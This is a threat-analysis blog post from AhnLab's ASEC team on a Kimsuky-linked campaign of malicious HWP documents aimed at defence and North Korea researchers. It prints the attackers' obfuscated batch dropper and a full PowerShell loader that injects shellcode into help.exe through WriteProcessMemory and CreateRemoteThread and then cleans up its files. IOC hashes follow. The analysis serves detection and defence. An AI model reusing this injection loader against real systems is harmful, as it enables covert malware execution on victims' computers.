The ASEC analysis team has discovered the active distribution of APT files that are exploiting a feature of HWP files (OLE object insertion) recently. After the case introduced in the post “Malicious HWP File Disguised as Press Release of 20th Presidential Election Early Voting for Sailors Being Distributed” on March 8th, the attacker is continuously distributing malicious HWP files targeting people in the field of national defense, North Korea-related materials, and broadcasting.
When the file is opened, the OLE object (batch file) in the HWP file is run. After that, powershell injects the shellcode into a normal process. The attackers usually use texts to prompt users to click them so that OLE objects (batch files) can be executed.
The list below is the names of malicious HWP files distributed with such an operation method. The attacks targeted people in the field of national defense, North Korea-related materials, and broadcasting, and the distribution was done using PC messengers and web browsers.
• For review_Understanding Politics 6th Period(edited)_20220507.hwp (May 10th, 2022)
• Peace Asia membership request form(2022).hwp (May 11th, 2022)
• Innovation class questionnaire.hwp (May 18th, 2022)
• Analysis of Covid-19 in North Korea.hwp (May 20th, 2022)
• Peace Asia membership request form(Kim **).hwp (May 20th, 2022)
• Kim ** resume.hwp (May 20th, 2022)
• 2022 notices main parts excerpted.hwp (May 23rd, 2022)
• (Research Advisory Committee)_National Assembly Futures Institute_Research Projects_Survey.hwp (May 25th, 2022)
• 8th period_complete_Understanding Politics_Editor.hwp (May 26th, 2022)
• 220530- Innovation class questionnaire.hwp (May 30th, 2022)
• 2022 13th scholarship application form(for education).hwp (May 30th, 2022)
• Ministry of National Defense Academic Conference Order.hwp (June 2nd, 2022)
• 2022-0626 Seong-lan Ha – Who’s Crying.hwp (June 7th, 2022)
The following is an internal batch file script of “2022-0626 Seong-lan Ha – Who’s Crying.hwp“ found on June 7th. While the script of the batch file exists in an obfuscated form, it can still ultimately inject the shellcode into a normal Windows process using powershell.
@echo off
IF EXIST "%PROGRAMFILES(X86)%" (set pspath="%windir%syswow64WindowsPowerShellv1.0powershell.exe")
ELSE (set pspath="%windir%system32WindowsPowerShellv1.0powershell.exe")
start "" %pspath% -command "$ttms="$eruk2="""2463029..omitted..3B7D7D""";
$blwp="""""";
for($i=0;$i -le $eruk2.Length-2;$i=$i+2){$NTMO=$eruk2[$i]+$eruk2[$i+1];$blwp= $blwp+[char]([convert]::toint16($NTMO,16));};
Invoke-Command -ScriptBlock ([Scriptblock]::Create($blwp));";
Invoke - Command - ScriptBlock([Scriptblock]::Create($ttms));"
As the file’s variable names and operation method are the same as the one revealed on March 3rd and discussed in the post “Malicious HWP File Disguised as Press Release of 20th Presidential Election Early Voting for Sailors Being Distributed” (https://asec.ahnlab.com/en/32456/), it is likely that the group behind the attack is identical.
- Identical variable names for the powershell used: $ttms, $eruk2
- Comparison of powershell commands (similarity in codes)
-> March 3rd: $kkx9=[DllImport(“user32.dll”)] public static extern bool ShowWindow(int handle, int state);
-> June 7th: $kkp8=@” [DllImport(“user32.dll”)] public static extern bool ShowWindow(IntPtr a, uint b);”@;
The following is the final powershell code for decryption. It reads the shellcode at the bottom part of the HWP file to perform an injection to a normal Windows process (help.exe).
$kkp8=@"
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr a, uint b);
"@;
$mmp8=Add-Type -MemberDefinition $kkp8 -Name "AAA" -PassThru;
$mmp8::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hP;
public IntPtr ht;
public uint dwProcessId;
public uint dwThreadId;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFO
{
public uint cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public uint wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
public static class Kernel32
{
[DllImport("kernel32.dll")]
public static extern bool CreateProcess(string a,string b,uint c,uint d,bool e,uint f,IntPtr g,string h, ref STARTUPINFO i,out PROCESS_INFORMATION j);
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalAlloc(uint a,uint b);
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr a,IntPtr b, uint c,uint d, uint e);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr a,IntPtr b,IntPtr c,uint d,IntPtr e);
[DllImport("kernel32.dll")]
public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateRemoteThread(IntPtr a,IntPtr b,uint c,IntPtr d,IntPtr e,uint f,IntPtr g);
}
"@
$si = New-Object STARTUPINFO;
$pi = New-Object PROCESS_INFORMATION;
$ap8=Get-WmiObject Win32_Process -filter "Name like 'Hwp%'";
$x=0;
$y=0;
while(1){if($y -eq 1){break;}if($ap8.GetType().Name -eq "Object[]"){if($x -eq $ap8.count){$y=1;}$bp8=$ap8[$x].Name;
$cp8=$ap8[$x++].CommandLine;}else{$bp8=$ap8.Name;
$cp8=$ap8.CommandLine;
$y=1;}$ep8=$cp8.Split('"').count;if($ep8 -eq 3){$fp8=$cp8.Split('"')[2].Split(' ')[1];}elseif($ep8 -eq 5){$fp8=$cp8.Split('"')[3];}$bytes = Get-Content $fp8 -Tail 1 -Encoding Byte;
$dp8="/c taskkill /f /im "+$bp8;cmd $dp8;if($bytes -eq 0x88){$gp8=""""+$env:TEMP+"alw0305k.con"+"""";
$hp8=""""+$env:TEMP+"t32.bat"+"""";
$ip8=""""+$fp8+"""";<strong>sleep</strong> 3;
$bytes = Get-Content $fp8 -Tail 0x332 -Encoding Byte;
$addr = [Kernel32]::GlobalAlloc(0x40, 0x400);
for ($h = 0;$h -lt 0x331;$h++)
{[System.Runtime.InteropServices.Marshal]::WriteByte($addr, $h, $bytes[$h]);};
[Kernel32]::CreateProcess("c:windowsSysWOW64help.exe",0,0,0,0,0x04,0,"c:",[ref] $si,[ref] $pi);
$kp8=$pi.hP;
$mp8=[Kernel32]::VirtualAllocEx($kp8,0,0x400,0x1000,0x40);[Kernel32]::WriteProcessMemory($kp8,$mp8,$addr, 0x331, 0);
$dp8="/c copy /y "+$gp8+" "+$ip8;
$pep8=0;
$psp8='0';do{$pep8++;
$psp8=cmd $dp8;<strong>sleep</strong> 1;if($pep8 -eq 5){break;}}while($psp8.Trim()[0] -ne '1');start $ip8;
$jp8="cmd /c del /f "+""""+$gp8+"""";cmd $jp8;
$jp8="cmd /c del /f "+""""+$hp8+"""";cmd $jp8;
$lp8 = [Kernel32]::CreateRemoteThread($kp8, 0, 0, $mp8, 0, 0, 0);[Kernel32]::WaitForSingleObject($lp8, 500*1000);}}
For malicious HWP files, APT files were usually distributed in the past using the Post Script vulnerability. However, recent distribution cases use a feature of the HWP file. Whereas the vulnerability runs the malicious shellcode on its own, the method using the OLE object performs malicious behaviors by involving the user (clicking).
After February 2017, Hancom Office officially distributed a security update for the Post Script vulnerability and removed the feature to insert and view EPS files. Due to such an update, it appears that the attacker exploited OLE objects to distribute malicious files so that the malicious behaviors can be executed even for users with the latest version of Hancom Office.
So far, there have been cases of malicious HWP files downloaded from web browsers or distributed through PC messengers. Users should refrain from opening attachments from posts from unknown sources and take extreme caution not to download and view files sent by an unknown user through a PC messenger.
[File Detection]
Infostealer/PS.Kimsuky
[IOC]
882546e8fc2dc2fd580170afda20e396
1d413a7c62b48760838bed0d03a35b05
393f78e609af5e77da5ea9ba10facbfb
e223711e31431250946203c27372cd3a
9aac95c3d76319fe3df9fed53fb06507
7442a74c7351b8ab0bb49b778530a95e
404e2fe1fbca70603cb91932664bc112
87c1f6ab7933bce7969f593e3c6096c2
393f78e609af5e77da5ea9ba10facbfb
b5b0ffecc4b30e7f140b517333c6a2d2
546ae7bd8b88289a21ac8d7dc62a3bd7
390a2439581b8c04adace93fed2e4425
7dea7277f672ad85fdf344c467f739eb
667dbfdc01cc6e808b2485c7eed74e97
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Source: https://asec.ahnlab.com/en/35405/